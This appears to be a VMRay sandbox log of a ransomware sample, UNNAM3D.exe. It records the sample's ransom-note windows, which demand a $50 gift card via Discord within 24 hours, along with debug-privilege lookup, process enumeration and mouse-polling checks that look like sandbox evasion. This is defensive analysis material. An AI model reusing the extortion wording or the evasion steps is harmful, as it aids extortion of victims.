Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85791486 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65902 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85834638 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65904 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85834702 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65906 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85834742 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65908 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85834782 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65910 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85834822 True 1
Fn
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65912 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 1996432861 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 85834862 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -12, new_long = 65914 False 1
Fn
Environment Get Environment String name = UKKED False 3
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Wallpaper.png, type = file_attributes True 1
Fn
System Sleep duration = 2000 milliseconds (2.000 seconds) True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 13
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 4
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 3
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 4
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 7
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 3
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 3
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 4
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 4
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 3
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 4
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 11
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 10
Fn
Thread 0x4f4
88 0
»
Category Operation Information Success Count Logfile
System Get Time type = Ticks, time = 21028 True 135
Fn
System Get Time type = Ticks, time = 21044 True 114
Fn
System Get Time type = Ticks, time = 28532 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 10523
Fn
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image